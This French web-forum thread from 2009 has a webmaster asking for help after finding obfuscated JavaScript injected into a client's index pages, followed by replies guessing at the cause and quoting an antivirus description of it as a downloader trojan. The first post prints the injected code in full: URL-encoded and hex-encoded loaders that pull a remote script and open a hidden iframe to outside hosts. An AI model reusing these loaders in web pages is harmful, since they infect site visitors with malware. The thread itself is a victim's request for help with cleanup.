Auteur Sujet: Code Javascript qui apparait dans les pages index  (Lu 1950 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne AnakinDSL

  • Habitué
  • **
  • Messages: 109
    • Guillaume Hénot Multlimedia Design
Code Javascript qui apparait dans les pages index
« le: 16 mai 2009 à 10:42:05 »
Bonjour,

Sur le site d'un de mes clients, j'ai remarqué que toutes les pages d'index (.html ou .php) c'étaient vue greffer des portions de code Javascript pas très catholique ...

si dessous un exemple :
Dans l'en-tête :
<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script>

Dans le corps de la page :
<script>
<!--
var d=document,kol=561;
function O10H485EAAA1E15E6(H485EAAA1E1DF5){ var H485EAAA1E25EA = 16; return( parseInt(H485EAAA1E1DF5,H485EAAA1E25EA));}function H485EAAA1E35DA(H485EAAA1E3DD7){ function H485EAAA1E4DC6() {return 2;} var H485EAAA1E45CF='';for(H485EAAA1E49C9=0; H485EAAA1E49C9<H485EAAA1E3DD7.length; H485EAAA1E49C9+=H485EAAA1E4DC6()){ H485EAAA1E45CF += ( String.fromCharCode (O10H485EAAA1E15E6(H485EAAA1E3DD7.substr(H485EAAA1E49C9, H485EAAA1E4DC6()))));}return H485EAAA1E45CF;} document.write(H485EAAA1E35DA('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323530333432292B27316634353930645C272077696474683D363239206865696768743D333938207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

En fin de page (après la balise </html> :
<script>check_content()</script>

C'est quoi ce truc ? Ça vient d'où ?
Uniquement les pages d'index (mais de tous les répertoires et sous-répertoires !!) ont été touchées.
Le tout à été fait le 26/04/2009 (date de modif du fichier).

Qu'est-ce qui à pu faire ça ?
J'ai pas remarqué de fichier(s) douteu(x) sur le site (ou alors il aura été effacé)
J'imagine que c'est un robot qui est passé par là ...

On l'a remarqué car ça a fait planté certains scripts PHP (Joomla entre autre) Mais il semblerais que ça ne soit pas la première attaque. En faisant le ménage, j'ai retrouvé un fichier modifié le 29/05/2008 avec la portion de code suivante dedans :
<script>
<!--
var d=document,kol=561;
function O10H485EAA9E6B3BF(H485EAA9E6BBB6){ function H485EAA9E6C3B1() {var H485EAA9E6CBA8=16;return H485EAA9E6CBA8;} return( parseInt(H485EAA9E6BBB6,H485EAA9E6C3B1()));}function H485EAA9E6D3A1(H485EAA9E6DB9C){  var H485EAA9E6E391='';for(H485EAA9E6EB8A=0; H485EAA9E6EB8A<H485EAA9E6DB9C.length; H485EAA9E6EB8A+=2){ H485EAA9E6E391 += ( String.fromCharCode (O10H485EAA9E6B3BF(H485EAA9E6DB9C.substr(H485EAA9E6EB8A, 2))));}return H485EAA9E6E391;} document.write(H485EAA9E6D3A1('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A37303536292B27303731333336353462645C272077696474683D3234206865696768743D323934207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

Des idées ???
ça pu le hacking, mais comment éviter que ça ne se reproduise ?  :huh: :huh: :huh: :huh: :huh:
<?php if (!isset($your_life)) die(); ?>

Hors ligne shaitan

  • Habitué
  • **
  • Messages: 142
    • Passion Xbmc
Re : Code Javascript qui apparait dans les pages index
« Réponse #1 le: 16 mai 2009 à 11:00:17 »
Bonjour,
Cela ressemble fortement à un problème rencontré par les forums SMF actuellement. Un robot qui s'inscrit et utilise une faille dans les uploads d'avatars pour envoyer un script qui va avoir une action assez destrictrice en modifiant le code des fichiers php. En ajoutant des choses codées en 64 bits comme dans ton code, du moins ça y ressemble.

Pour Joomla je ne sais pas, sans doute une procédure assez similaire.

Il faudrait déjà identifier le robot, sans doute que sur les sites traitant de Joomla on doit connaitre le problème, ensuite bannir le fautif, reforcer les procédure d'inscriptions et anti spam en général, remettre à neuf les fichiers modifiés avec un backup. Si par exemple sous Joomla l'astuce consiste aussi à uploader une image, enlever ce droit aux membres.

Donc tout ça sous réserve, je ne connais que le cas SMF, ça y ressemble fortement, c'est tout ce que je peux te dire.

cl1-sq4 , serveur de fichiers 4 et mon Fai est Free.
Et mon site est là: http://passion-xbmc.org/forum/
Quand à mes requêtes elles sont optimisées.

Hors ligne boulaneige

  • Connaisseur
  • ***
  • Messages: 337
    • http://www.boulaneige.com/
Re : Code Javascript qui apparait dans les pages index
« Réponse #2 le: 16 mai 2009 à 15:49:27 »
Salut,

En tout cas, rien que l'ouverture de cette page affole mon antivirus !

* Petite scarabette *

Hors ligne shaitan

  • Habitué
  • **
  • Messages: 142
    • Passion Xbmc
Re : Code Javascript qui apparait dans les pages index
« Réponse #3 le: 16 mai 2009 à 16:02:27 »
Interéssant.

D'ailleurs certains des scripts dont je parlais peuvent contaminer les visiteurs qui surferaient encore avec Ie6.
cl1-sq4 , serveur de fichiers 4 et mon Fai est Free.
Et mon site est là: http://passion-xbmc.org/forum/
Quand à mes requêtes elles sont optimisées.

Hors ligne AnakinDSL

  • Habitué
  • **
  • Messages: 109
    • Guillaume Hénot Multlimedia Design
Re : Code Javascript qui apparait dans les pages index
« Réponse #4 le: 16 mai 2009 à 16:13:23 »
mmm,

Ce qui est étrange, c'est que le Joomla instalé n'est pas encore en service (il devra remplacer l'actuel site en HTML simple), et qu'aucune inscription n'a été faite sur celui-ci ni dans virtuemart.

Et en 2008, le site était uniquement en HTML fixe.

Où peut être la faille ?
Effectivement, si on lance un fichier contenant les codes JS ci-dessus, on a une alerte de sécurité.
Ce qui me rassure encore moins.
<?php if (!isset($your_life)) die(); ?>

Hors ligne shaitan

  • Habitué
  • **
  • Messages: 142
    • Passion Xbmc
Re : Code Javascript qui apparait dans les pages index
« Réponse #5 le: 16 mai 2009 à 18:01:19 »
Je pense qu'il te faut soit nettoyer tous les fichiers à l'aide d'un script php, ou autrement localement, soit remettre en ligne une version propre.
Cela me parait assez impératif. Et il est clair qu'il faudrait trouver la faille mais là, aucune idée. Ce qui est surprenant c'est que Cms fonctionne encore.
Je me met à ta place, j'ai cru la semaine passé être touché par l'infection pour forum Smf et j'étais vert, j'avais certains symptômes mais les investigations n'ont rien montré d'inhabituel, c'était les pics de fréquentations qui dépassaient la norme sur mon site et qui causaient des problèmes.
Bref, courage..
cl1-sq4 , serveur de fichiers 4 et mon Fai est Free.
Et mon site est là: http://passion-xbmc.org/forum/
Quand à mes requêtes elles sont optimisées.

Hors ligne _phineas_

  • Habitué
  • **
  • Messages: 182
    • http://www.cnversailles.org
Re : Code Javascript qui apparait dans les pages index
« Réponse #6 le: 17 mai 2009 à 10:25:55 »
ce code affole également mon antivirus (Avira aussi) et voilà ce qu'il en dit :

Virus: JS/Dldr.Iframe.BM
Date discovered: 17/06/2008
Type: Trojan
Subtype: Downloader
In the wild: No
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No
File size: ~ 10.000 Bytes
IVDF version: 7.00.04.210 - Tue, 17 Jun 2008 17:15 (GMT+1)

 General Method of propagation:
   • No own spreading routine


Aliases:
   •  TrendMicro: Mal_Hifrm-2
   •  Bitdefender: Trojan.JS.IFrame.ACI


Platforms / OS:
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Side effects:
   • Downloads a malicious file

 Files – The location is the following:
   • http://77.221.133.171/**********go.html?
Further investigation pointed out that this file is malware, too. Detected as: HTML/Dldr.Iframe.ED


Hors ligne AnakinDSL

  • Habitué
  • **
  • Messages: 109
    • Guillaume Hénot Multlimedia Design
Re : Code Javascript qui apparait dans les pages index
« Réponse #7 le: 17 mai 2009 à 10:35:01 »
Eh beh ...

Bon j'ai nettoyé tous les fichiers en tout cas.
Mais c'est quand même la folie, je trouve pas ce qui a causé ça :(
Y'a rien dans les logs du serveur non plus.

Merci en tout cas !!
<?php if (!isset($your_life)) die(); ?>